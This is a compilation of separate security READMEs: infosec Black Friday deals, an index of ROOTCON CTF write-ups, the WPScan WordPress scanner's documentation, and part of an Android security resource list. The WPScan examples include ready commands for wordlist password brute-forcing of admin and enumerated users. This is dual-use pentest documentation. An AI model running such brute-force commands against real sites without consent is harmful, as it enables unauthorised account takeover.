10% off at checkout with code: PRODEXAM10 \
Deal ends: December 31st
## Practical Labs (NEW CATEGORY):
Cyberwarfare Labs \
https://www.cyberwarfare.live/cwl-black-friday-sale-2022/
20% off individual courses with code: CWLBLACKFRIDAY20 \
25% off individual training with code: CWLBLACKFRIDAYT25 \
https://www.cyberwarfare.live/course-bundle-deals
30%-60% off on bundle deals
PWNX Cyber Lab Game & Training \
https://play.pwnx.io
50% off premium packages \
Deal ends: 30th November
The Offensive Labs (Security 100% Hands-On Training) \
https://www.theoffensivelabs.com
70% off any course with code: BLACKFRIDAY22 \
Deal ends: December
Pensterlab :see_no_evil:\
https://pentesterlab.com/pro
27% off one year subscription \
(1) US$146 instead of US$199 \
(2) US$25.99 instead of US$34.99 for students
Deal valid: 24-29th November
KodeKloud - DevSecOps Training \
https://kodekloud.com/pricing/
KodeKloud STANDARD - 40 % Off \
KodeKloud PRO - 55 % Off \
Deal Time: Ongoing
Tib3rius - Privilege Escalation for OSCP & Beyond! \
https://courses.tib3rius.com
75% off any course or bundle with code: BLACKFRIDAY \
Deal ends: December 1
Tryhackme \
https://tryhackme.com/
Tryhackme personal Annual subscription - 20 % Off \
Code: AOC22 \
Deal ends: 29th November
## Mini Courses:
Pluralsight Security Training \
https://www.pluralsight.com/offer/2022/bf-cm-50-off
Standard SAVE 50% - $149 ($299 original) per year \
Premium SAVE 50% - $224 ($449 original) per year \
Deal live now
Hacking Android Applications for Bug Bounty and Pentesting \
https://www.udemy.com/course/hacking-android-applications-for-bug-bounty-and-pentesting/?couponCode=BLACKFRIDAY
65% off at checkout with code: BLACKFRIDAY \
Deal ends: 27th November
Penetration Testing Fundamentals (GERMAN) \
https://karrierewelt.golem.de/collections/black-week/products/penetration-testing-fundamentals
50% off at checkout \
Deal ends: 30th November
INE Training and Certifications (including eLearn Certifications) \
https://linktr.ee/inetraining
(1) 40% off all eLearn certifications - thanks40 \
(2) 40% off ICCA certificatiom - thanks40 \
(3) INE Premium at $499 from $799 - blkfri499 \
(4) INE Premium+ at $649 from $999 - blkfri649 \
(5) Pentester Academy at $199 from $249 - BF199 \
(6) Pentester Academy Bootcamps at 10% off - BF10 \
Deal ends: 25th November
## Hardware:
KSEC LABS (Red Team Tools, Locksmith, Hacker Gadgets) \
https://labs.ksec.co.uk/black-friday-sale/
Various discounts, free items, free shipping and codes on page to use \
15% off all products with code: BLACKFRIDAY15
Deal ends: December
Hak5 (Red Team Tools, Hacker Gadgets) :see_no_evil:\
https://hak5.org
Various discounts, free items, e-books, discount on the shipping \
Get 2% OFF for every 100$ spent up to 10% \
Get 200$ OFF for WiFi Pineapple Enterprise \
Get 15% OFF for bundles \
Deal ends: End of November
Maltronics (Red Team Tools, Hacker Gadgets) \
https://maltronics.com
15% off site wide with code: BF2022
iFixIt Hardware and Security Tooling \
https://www.ifixit.com/promotions/black-friday-holiday
25% Off Seasonal Bundles \
20% Off Toolkits \
Multiple On-Sale Kits \
Deal Ends: November 28
BusKill (Magnetic Breakaway Dead Man Switch) :see_no_evil: \
https://buskill.in/
Get 10% off all orders paid with cryptocurrency \
Deal ends: Dec 04
EXPLIoT \
https://store.expliot.io
Get More Than You Bought + 5% Off on EXPLIoT Products \
Deal ends: 30th Nov
## Wearables:
Security Merch (Merchandise for Hackers) \
https://securitymerch.com
50% Off with code: BLACKFRIDAY22 \
Deal Ends: November 30
Miscreants - Thoughtfully designed apparel and homegoods for hackers :see_no_evil: \
New collection (Object Oriented) drops 11/25 Midnight EST \
https://shopmiscreants.com/?ref=0x09n
20% Off Everything with code: COZY20 \
Deal valid November 25th-28th
## Books:
No Starch Press - InfoSec Books :see_no_evil:\
https://nostarch.com/
35% off + free shipping on U.S. orders over $50 with code HOLIDEALS \
Deal ends: 28th November
Microsoft Press Store (Security Books)\
https://www.microsoftpressstore.com/
40-55% on books and ebooks with code BOOKSGIVING \
Deal ends: End of November
## Games (NEW CATEGORY):
CantHide Geolocation OSINT \
https://canthide.me
90% off unlimited subscription for 1 months \
Deal ends: 31st December
Elevation of Privilege Card Game \
https://agilestationery.com/products/elevation-of-privilege-game
(1) 15% off with code: CYBER15 \
(2) 30% off 3 or more items with code: CYBER30 \
Deal valid: 14-30th November
Cornucopia Card Game \
https://agilestationery.com/products/owasp-cornucopia-card-deck-ecommerce-website-edition
(1) 15% off with code: CYBER15 \
(2) 30% off 3 or more items with code: CYBER30 \
Deal valid: 14-30th November
Agile Stationery: Cybersecurity Games and Tools (stencils, sketch pads, posters, privacy tools etc...) \
https://agilestationery.com/pages/cybersecurity-games-and-tools
(1) 15% off with code: CYBER15 \
(2) 30% off 3 or more items with code: CYBER30 \
Deal valid: 14-30th November
Play 2 Learn: Remote Facilitation of Elevation of Privilege Games \
https://agilestationery.com/pages/play-elevation-of-privilege-with-adam-shostack
15% off sessions booked in Q1. Excludes delivery. \
Deal ends: 15th December
## Services:
ESET Anti-Virus \
https://www.eset.com/us/cyber-week-2022/
50% off regular licenses \
Surfshark VPN \
https://surfshark.com/deals
84% off and 2 months free \
Deal valid until 26th November \
NordVPN \
https://nordvpn.com/offer
68% off \
Deal live now
ProtonVPN \
https://protonvpn.com/blackfriday/
50% off + 6 months free \
Deal live now
ProtonMail \
https://proton.me/mail/black-friday
40% off \
Deal live now
Intego Mac Antivirus and Security \
https://offer.intego.com/en/mpb-sale?aff_id=14341&coupon=1Y29X2&vpn=1
65% off \
Deal ends: December
WPSec WordPress Vulnerability Scanner \
https://wpsec.com/blackfriday/
$29 off
BitDefender \
https://www.bitdefender.com/solutions
Up to 67% off \
Deal live now
LastPass \
https://www.lastpass.com
Get 25% Off \
Deal valid for Cyber Week
Anonaddy email alias service \
https://anonaddy.com/
40% off first year with code BLACKFRIDAY22 \
Deal ends: Nov 30th
Kleen Scan AV Scanner \
https://kleenscan.com/latest_news
Get yearly package for $10 (down from $180)
Guardian Firewall + VPN \
https://guardianapp.com/thanksgiving-sale-2022/
Get 20% off Guardian Pro \
Deal ends: end of Cyber Monday 2022 \
Daito Authenticator - Web-based & shared 2FA for teams \
https://www.daito.io/
30% off first month or entire first year with code BLACKFRIDAY2022 \
Deal ends: Nov 30th
-----------------------------------------------------------------------------------------
## How to edit formatting
At the end of a normal sentence, place a backslash for newline (\)
After a link, please use a double-space ( )
## Credits
If you wouldd like to DM me a deal rather than submitting a PR: @securitymeta_
Other PRs and sources will be thanked here.
Thanks to those who credited and help spread the word!
## Discoverability
infosec black friday, information security black friday, cybersec black friday, cyber security black friday, netsec black friday, hacking black friday
infosec cyber monday, information security cyber monday, cybersec cyber monday, cyber security cyber monday, netsec cyber monday, hacking cyber monday
infosec deals, coupons, discounts, sales, pentest, penetration test, red team, blue team, purple team, thanksgiving
|
# A Compilation of ROOTCON CTF Write-ups
This will serve as links to write-ups about solving the challenges on ROOTCON's CTF through the years
If you want to publish your write-ups send us a ping at Discord (https://rootc.onl/discord) or fork the repo, make changes and do a pull request.
**ROOTCON16 Finals (2022)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| ROOTCON 16 CTF Web Writeup | AJ Dumanhug | PwnDeManila | https://atom.hackstreetboys.ph/rootcon-16-web-ctf-writeup/ |
| ROOTCON 16 CTF Forensics 100 Writeup | Gio Ascan | CountToTen | https://medium.com/@gioascan/rootcon16-for100-writeup-703fec83dec8 |
**ROOTCON16 Pre-Qualifiers (2022)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| ROOTCON 16 CTF Pre-Qualifier - Easy | laet4x | HackingKaNalang | https://ctf.laet4x.com/ctf-2022/rootcon-16-pre-qualifier |
**ROOTCON15 (2021)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| Web (200 Points) | laet4x | Squid Gamers | https://laet4x.medium.com/rootcon15-ctf-web-200-91a9eee0b62f |
| BinForCry | Shav Manalo | Queen Anne’s Revenge | https://medium.com/@r3dact0r/binforcry-rootcon-15-ctf-safe-mode-writeup-1d9234ae771f |
| ROOTCON 15 Capture The Flag | blackb3ard | Queen Anne’s Revenge | https://blackbeard666.github.io/pwn_exhibit/content/2021_CTF/RC15/rootcon15ctf.md |
| ROOTCON 15 CTF Writeup — BinForCry | - | Theos OffSec Team | https://medium.com/@theos.offsec/rootcon-15-ctf-writeup-binforcry-17653368e002 |
| ROOTCON 15 CTF Writeup — Exploitation | - | Theos OffSec Team | https://medium.com/@theos.offsec/rootcon-15-ctf-writeup-exploitation-43ba9acaf13f |
| ROOTCON 15 CTF Writeup — OSINT | - | Theos OffSec Team | https://medium.com/@theos.offsec/rootcon-15-ctf-writeup-osint-d580ecb9944d |
| ROOTCON 15 CTF Writeup — Web | - | Theos OffSec Team | https://medium.com/@theos.offsec/rootcon-15-ctf-writeup-web-85c5dd8017c6 |
**ROOTCON Recovery Mode (2020)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| ROOTCON Recovery Mode 2020 | Al Francis | MI | https://laet4x.medium.com/rootcon-recovery-mode-ctf-forensics-warm-up-660254c8d176 |
| ROOTCON Recovery Mode 2020 | ar33zy | Facbois | https://medium.com/@ar33zy/for-200-rootcon-14-ctf-finals-writeup-7bce60791dcd |
| ROOTCON Recovery Mode 2020 | Alexis Lingad | Hackuna Beta | https://medium.com/@johnlingadx/rootcon14-challenge-sour-wine-web-challenge-write-up-b7e82e21c50b |
**ROOTCON Easter Egg Hunt (2020)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| ROOTCON Easter Egg Hunt 2020 | Felix Angelo Mendoza | hackstreetboys | https://seymour.hackstreetboys.ph/chals/ctf/2020-ROOTCONEasterEggHunt.html |
| ROOTCON Easter Egg Hunt 2020 | Ameer Pornillos | hackstreetboys | https://ethicalhackers.club/rootcon-2020-easter-egg-hunt-flags/ |
| ROOTCON Easter Egg Hunt 2020: Space Challenge | AJ Dumanhug | hackstreetboys | https://medium.com/@ajdumanhug/rootcon-easter-egg-hunt-2020-space-challenge-a6ec26ef480c |
| ROOTCON Easter Egg Hunt 2020 | Ariz Soriano | hackstreetboys | https://ar33zy.hackstreetboys.ph/rootcon/ctf/rootcon-easter-egg-2020/ |
| ROOTCON Easter Egg Hunt 2020: Power Challenge | Joseph Hermocilla | - | https://github.com/CLKTCK/ctf-writeups/tree/master/rc14-egg/power |
**ROOTCON 13 (2019)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| Forensics: Makabayan Writeup | Ameer Pornillos | hackstreetboys' G3{Gd's Gift to Girls} | https://medium.com/@ameerpornillos/hsb-team-g3-rootcon-13-ctf-forensics-makabayan-writeup-83f1505a9926 |
| Writeups for Web Category | AJ Dumanhug | hackstreetboys' G3{Gd's Gift to Girls} | https://medium.com/bugbountywriteup/rootcon-2019s-ctf-writeups-for-web-category-753abe95fe15 |
| Khal Dereta Write-up | Angel Ctulhu | - | https://ctulhu.me/2019/09/29/rootcon-ctf-2019-kahl-dereta-write-up/ |
| Forensics 100 and 200 Write-up | Isaiah Puzon | DiKoPoAlam | https://medium.com/@isaiah.puzon/rootcon-2019-ctf-forensics-100-and-200-writeup-74ca4a1a17c9
| Fresh From the Ooooooven Write Up | PJ Bautista | Cryptors | https://medium.com/@pjbautista/rootcon-ctf-2019-fresh-from-the-ooooooven-write-up-db2da715bafd |
**ROOTCON 12 (2018)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| CryForBin 7 and CryForBin 8 | Ameer Pornillos | hackstreetboys' Ethical Hackers Club | https://ethicalhackers.club/rootcon-12-ctf-cryforbin-7-and-cryforbin-8-write-up/ |
| CryForBin 2,3,4,6,7,8 Write-Up | Mon Liclican | hackstreetboys' Harambae | https://medium.com/hackstreetboys/hsb-team-harambae-presents-rootcon-12-ctf-update-cryforbin-2-3-4-6-7-8-write-up-c2f8917c8aab |
| CryForBin 5 Post-Con Write-Up | Mon Liclican | hackstreetboys' Harambae | https://medium.com/hackstreetboys/rootcon-12-ctf-cryforbin-5-post-con-write-up-6cb00a5fc3cf |
| Web 5 Write-up (200 points) | AJ Dumanhug | hackstreetboys' Ethical Hackers Club | https://medium.com/hackstreetboys/rootcon-2018s-ctf-web-5-200-points-d5966651fb3b |
**ROOTCON 11 (2017)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| Easter Egg Hunt Write-Up | Mon Liclican | - | https://medium.com/@monliclican/rootcon-easter-egg-hunt-2017-write-up-af5a12833a32 |
| BinForCry Write-up/Walkthrough (Part 1 of x) | Mon Liclican | hackstreetboy's Harambae | https://medium.com/@monliclican/rootcon-ctf-2017-update-binforcry-write-up-walkthrough-part-1-of-x-c015d60e2583 |
| BinForCry 350 Write-up/Walkthrough (Part 2 of x) | Mon Liclican | hackstreetboys' Harambae | https://medium.com/@monliclican/rootcon-2017-ctf-binforcry-350-write-up-walkthrough-part-2-of-x-5731c91c2266 |
| BinForCry 100 Write-up/Walkthrough (Part 3 of x) | Mon Liclican | hackstreetboys' Harambae | https://medium.com/@monliclican/rootcon-2017-ctf-binforcry-100-write-up-walkthrough-part-3-of-x-9bde70e09e9 |
| BinForCry 350 Write-Up/Solution | Ameer Pornillios | hackstreetboys' Ethical Hackers Club | https://www.youtube.com/watch?v=cYzJf12VrKA |
**ROOTCON 6 (2012)**
| Title | Author | Team | Link |
| --- | --- | --- | --- |
| Easter Egg Hunt Write-up | Geff Chang | - | https://geffchang.wordpress.com/2012/04/09/how-i-solved-the-rootcon-6-easter-egg-hunt/ |
| Easter Egg Hunt Solution | ROOTCON | - | http://blog.rootcon.org/2012/04/rootcon-easter-egg-solution.html |
[to be updated]
|
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/wpscan_logo_407x80.png "WPScan - WordPress Security Scanner")
[![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan)
[![Code Climate](https://img.shields.io/codeclimate/github/wpscanteam/wpscan.svg)](https://codeclimate.com/github/wpscanteam/wpscan)
[![Dependency Status](https://img.shields.io/gemnasium/wpscanteam/wpscan.svg)](https://gemnasium.com/wpscanteam/wpscan)
[![Docker Pulls](https://img.shields.io/docker/pulls/wpscanteam/wpscan.svg)](https://hub.docker.com/r/wpscanteam/wpscan/)
# LICENSE
## WPScan Public Source License
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2017 WPScan Team.
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.
### 1. Definitions
1.1 "License" means this document.
1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
1.3 "WPScan Team" means WPScan’s core developers, an updated list of whom can be found within the CREDITS file.
### 2. Commercialization
A commercial use is one intended for commercial advantage or monetary compensation.
Example cases of commercialization are:
- Using WPScan to provide commercial managed/Software-as-a-Service services.
- Distributing WPScan as a commercial product or as part of one.
- Using WPScan as a value added service/product.
Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to):
- Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit.
- Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux.
- Using WPScan to test your own systems.
- Any non-commercial use of WPScan.
If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - team@wpscan.org.
We may grant commercial licenses at no monetary cost at our own discretion if the commercial usage is deemed by the WPScan Team to significantly benefit WPScan.
Free-use Terms and Conditions;
### 3. Redistribution
Redistribution is permitted under the following conditions:
- Unmodified License is provided with WPScan.
- Unmodified Copyright notices are provided with WPScan.
- Does not conflict with the commercialization clause.
### 4. Copying
Copying is permitted so long as it does not conflict with the Redistribution clause.
### 5. Modification
Modification is permitted so long as it does not conflict with the Redistribution clause.
### 6. Contributions
Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content.
### 7. Support
WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team.
### 8. Disclaimer of Warranty
WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing.
### 9. Limitation of Liability
To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services.
### 10. Disclaimer
Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan.
### 11. Trademark
The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo.
# INSTALL
WPScan comes pre-installed on the following Linux distributions:
- [BackBox Linux](http://www.backbox.org/)
- [Kali Linux](http://www.kali.org/)
- [Pentoo](http://www.pentoo.ch/)
- [SamuraiWTF](http://samurai.inguardians.com/)
- [BlackArch](http://blackarch.org/)
On macOS WPScan is packaged by [Homebrew](https://brew.sh/) as [`wpscan`](http://braumeister.org/formula/wpscan).
Windows is not supported
We suggest you use our official Docker image from https://hub.docker.com/r/wpscanteam/wpscan/ to avoid installation problems.
# DOCKER
Pull the repo with `docker pull wpscanteam/wpscan`
## Start WPScan
```
docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options]
```
For the available Options, please see https://github.com/wpscanteam/wpscan#wpscan-arguments
If you run the git version of wpscan we included some binstubs in ./bin for easier start of wpscan.
## Examples
Mount a local wordlist to the docker container and start a bruteforce attack for user admin
```
docker run -it --rm -v ~/wordlists:/wordlists wpscanteam/wpscan --url https://yourblog.com --wordlist /wordlists/crackstation.txt --username admin
```
(This mounts the host directory `~/wordlists` to the container in the path `/wordlists`)
Use logfile option
```
# the file must exist prior to starting the container, otherwise docker will create a directory with the filename
touch ~/FILENAME
docker run -it --rm -v ~/FILENAME:/wpscan/output.txt wpscanteam/wpscan --url https://yourblog.com --log /wpscan/output.txt
```
Published on https://hub.docker.com/r/wpscanteam/wpscan/
# Manual install
## Prerequisites
- Ruby >= 2.1.9 - Recommended: 2.4.2
- Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
- RubyGems - Recommended: latest
- Git
### Installing dependencies on Ubuntu
sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
### Installing dependencies on Debian
sudo apt-get install gcc git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev
### Installing dependencies on Fedora
sudo dnf install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel patch rpm-build
### Installing dependencies on Arch Linux
pacman -Syu ruby
pacman -Syu libyaml
### Installing dependencies on macOS
Apple Xcode, Command Line Tools and the libffi are needed (to be able to install the FFI gem), See [http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error](http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error)
## Installing with RVM (recommended when doing a manual install)
If you are using GNOME Terminal, there are some steps required before executing the commands. See here for more information:
https://rvm.io/integration/gnome-terminal#integrating-rvm-with-gnome-terminal
# Install all prerequisites for your OS (look above)
cd ~
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
rvm install 2.4.2
rvm use 2.4.2 --default
echo "gem: --no-ri --no-rdoc" > ~/.gemrc
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler
bundle install --without test
## Installing manually (not recommended)
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
# KNOWN ISSUES
- no such file to load -- rubygems
```update-alternatives --config ruby```
And select your ruby version
See [https://github.com/wpscanteam/wpscan/issues/148](https://github.com/wpscanteam/wpscan/issues/148)
# WPSCAN ARGUMENTS
--update Update the database to the latest version.
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs
t themes
vt only vulnerable themes
at all themes (can take a long time)
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"
--exclude-content-based "<regexp or string>"
Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file | -c <config file> Use the specified config file, see the example.conf.json.
--user-agent | -a <User-Agent> Use the specified User-Agent.
--cookie <string> String to read cookies from.
--random-agent | -r Use a random User-Agent.
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch Never ask for user input, use the default behaviour.
--no-color Do not use colors in the output.
--log [filename] Creates a log.txt file with WPScan's output if no filename is supplied. Otherwise the filename is used for logging.
--no-banner Prevents the WPScan banner from being displayed.
--disable-accept-header Prevents WPScan sending the Accept HTTP header.
--disable-referer Prevents setting the Referer header.
--disable-tls-checks Disables SSL/TLS certificate verification.
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specify it.
Subdirectories are allowed.
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory.
If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
If no protocol is given (format host:port), HTTP will be used.
--proxy-auth <username:password> Supply the proxy login credentials.
--basic-auth <username:password> Set the HTTP Basic authentication.
--wordlist | -w <wordlist> Supply a wordlist for the password brute forcer.
If the "-" option is supplied, the wordlist is expected via STDIN.
--username | -U <username> Only brute force the supplied username.
--usernames <path-to-file> Only brute force the usernames from the file.
--cache-dir <cache-directory> Set the cache directory.
--cache-ttl <cache-ttl> Typhoeus cache TTL.
--request-timeout <request-timeout> Request Timeout.
--connect-timeout <connect-timeout> Connect Timeout.
--threads | -t <number of threads> The number of threads to use when multi-threading requests.
--throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1.
--help | -h This help screen.
--verbose | -v Verbose output.
--version Output the current version and exit.
# WPSCAN EXAMPLES
Do 'non-intrusive' checks...
```ruby wpscan.rb --url www.example.com```
Do wordlist password brute force on enumerated users using 50 threads...
```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50```
Do wordlist password brute force on enumerated users using STDIN as the wordlist...
```crunch 5 13 -f charset.lst mixalpha | ruby wpscan.rb --url www.example.com --wordlist -```
Do wordlist password brute force on the 'admin' username only...
```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin```
Enumerate installed plugins...
```ruby wpscan.rb --url www.example.com --enumerate p```
Run all enumeration tools...
```ruby wpscan.rb --url www.example.com --enumerate```
Use custom content directory...
```ruby wpscan.rb -u www.example.com --wp-content-dir custom-content```
Update WPScan's databases...
```ruby wpscan.rb --update```
Debug output...
```ruby wpscan.rb --url www.example.com --debug-output 2>debug.log```
# PROJECT HOME
[http://www.wpscan.org](http://www.wpscan.org)
# VULNERABILITY DATABASE
[https://wpvulndb.com](https://wpvulndb.com)
# GIT REPOSITORY
[https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan)
# ISSUES
[https://github.com/wpscanteam/wpscan/issues](https://github.com/wpscanteam/wpscan/issues)
# DEVELOPER DOCUMENTATION
[http://rdoc.info/github/wpscanteam/wpscan/frames](http://rdoc.info/github/wpscanteam/wpscan/frames)
|
# android-security-awesome ![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)
[![Link Liveness Checker](https://github.com/ashishb/android-security-awesome/actions/workflows/validate-links.yml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/validate-links.yml) [![Lint Shell scripts](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-shell-script.yaml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-shell-script.yaml) [![Lint Markdown](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-markdown.yaml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-markdown.yaml) [![Lint YAML](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-yaml.yaml/badge.svg)](https://github.com/ashishb/android-security-awesome/actions/workflows/lint-yaml.yaml)
A collection of Android security-related resources.
1. [Tools](#tools)
1. [Academic/Research/Publications/Books](#academic)
1. [Exploits/Vulnerabilities/Bugs](#exploits)
## Tools
### Online Analyzers
1. [AndroTotal](http://andrototal.org/)
1. [Appknox](https://www.appknox.com/) - not free
1. [Virustotal](https://www.virustotal.com/) - max 128MB
1. [Fraunhofer App-ray](http://app-ray.co/) - not free
1. [NowSecure Lab Automated](https://www.nowsecure.com/blog/2016/09/19/announcing-nowsecure-lab-automated/) - Enterprise tool for mobile app security testing both Android and iOS mobile apps. Lab Automated features dynamic and static analysis on real devices in the cloud to return results in minutes. Not free
1. [App Detonator](https://appdetonator.run/) - Detonate APK binary to provide source code level details including app author, signature, build, and manifest information. 3 Analysis/day free quota.
1. [Pithus](https://beta.pithus.org/) - Open-Source APK analyzer. Still in Beta for the moment and limited to static analysis for the moment. Possible to hunt malware with Yara rules. More [here](https://beta.pithus.org/about/).
1. [Approver](https://approver.talos-sec.com/) - Approver is a fully automated security analysis and risk assessment platform for Android and iOS apps. Not free.
1. [Oversecured](https://oversecured.com/) - Enterprise vulnerability scanner for Android and iOS apps, it offers app owners and developers the ability to secure each new version of a mobile app by integrating Oversecured into the development process. Not free.
1. [AppSweep by Guardsquare](https://appsweep.guardsquare.com/) - Free, fast Android application security testing for developers
1. [Koodous](https://koodous.com) - Performs static/dynamic malware analysis over a vast repository of Android samples and checks them against public and private Yara rules.
1. ~~[BitBaan](https://malab.bitbaan.com/)~~
1. ~~[AVC UnDroid](http://undroid.av-comparatives.info/)~~
1. ~~[AMAaaS](https://amaaas.com) - Free Android Malware Analysis Service. A bare-metal service features static and dynamic analysis for Android applications. A product of [MalwarePot](https://malwarepot.com/index.php/AMAaaS)~~.
1. ~~[AppCritique](https://appcritique.boozallen.com) - Upload your Android APKs and receive comprehensive free security assessments~~
1. ~~[NVISO ApkScan](https://apkscan.nviso.be/) - sunsetting on Oct 31, 2019~~
1. ~~[Mobile Malware Sandbox](http://www.mobilemalware.com.br/analysis/index_en.php)~~
1. ~~[IBM Security AppScan Mobile Analyzer](https://appscan.bluemix.net/mobileAnalyzer) - not free~~
1. ~~[Visual Threat](https://www.visualthreat.com/) - no longer an Android app analyzer~~
1. ~~[Tracedroid](http://tracedroid.few.vu.nl/)~~
1. ~~[habo](https://habo.qq.com/) - 10/day~~
1. ~~[CopperDroid](http://copperdroid.isg.rhul.ac.uk/copperdroid/)~~
1. ~~[SandDroid](http://sanddroid.xjtu.edu.cn/)~~
1. ~~[Stowaway](http://www.android-permissions.org/)~~
1. ~~[Anubis](http://anubis.iseclab.org/)~~
1. ~~[Mobile app insight](http://www.mobile-app-insight.org)~~
1. ~~[Mobile-Sandbox](http://mobile-sandbox.com)~~
1. ~~[Ijiami](http://safe.ijiami.cn/)~~
1. ~~[Comdroid](http://www.comdroid.org/)~~
1. ~~[Android Sandbox](http://www.androidsandbox.net/)~~
1. ~~[Foresafe](http://www.foresafe.com/scan)~~
1. ~~[Dexter](https://dexter.dexlabs.org/)~~
1. ~~[MobiSec Eacus](http://www.mobiseclab.org/eacus.jsp)~~
1. ~~[Fireeye](https://fireeye.ijinshan.com/)- max 60MB 15/day~~
### Static Analysis Tools
1. [Androwarn](https://github.com/maaaaz/androwarn/) - detect and warn the user about potential malicious behaviors developed by an Android application.
1. [ApkAnalyser](https://github.com/sonyxperiadev/ApkAnalyser)
1. [APKInspector](https://github.com/honeynet/apkinspector/)
1. [Droid Intent Data Flow Analysis for Information Leakage](https://www.cert.org/secure-coding/tools/didfail.cfm)
1. [DroidLegacy](https://bitbucket.org/srl/droidlegacy)
1. ~~[Smali CFG generator](https://github.com/EugenioDelfa/Smali-CFGs)~~
1. [FlowDroid](https://blogs.uni-paderborn.de/sse/tools/flowdroid/)
1. [Android Decompiler](https://www.pnfsoftware.com/) – not free
1. [PSCout](https://security.csl.toronto.edu/pscout/) - A tool that extracts the permission specification from the Android OS source code using static analysis
1. [Amandroid](http://amandroid.sireum.org/)
1. [SmaliSCA](https://github.com/dorneanu/smalisca) - Smali Static Code Analysis
1. [CFGScanDroid](https://github.com/douggard/CFGScanDroid) - Scans and compares CFG against CFG of malicious applications
1. [Madrolyzer](https://github.com/maldroid/maldrolyzer) - extracts actionable data like C&C, phone number etc.
1. [SPARTA](https://www.cs.washington.edu/sparta) - verifies (proves) that an app satisfies an information-flow security policy; built on the [Checker Framework](https://types.cs.washington.edu/checker-framework/)
1. [ConDroid](https://github.com/JulianSchuette/ConDroid) - Performs a combination of symbolic + concrete execution of the app
1. [DroidRA](https://github.com/serval-snt-uni-lu/DroidRA)
1. [RiskInDroid](https://github.com/ClaudiuGeorgiu/RiskInDroid) - A tool for calculating the risk of Android apps based on their permissions, with an online demo available.
1. [SUPER](https://github.com/SUPERAndroidAnalyzer/super) - Secure, Unified, Powerful and Extensible Rust Android Analyzer
1. [ClassyShark](https://github.com/google/android-classyshark) - Standalone binary inspection tool which can browse any Android executable and show important info.
1. [StaCoAn](https://github.com/vincentcox/StaCoAn) - Cross-platform tool which aids developers, bug-bounty hunters, and ethical hackers in performing static code analysis on mobile applications. This tool was created with a big focus on usability and graphical guidance in the user interface.
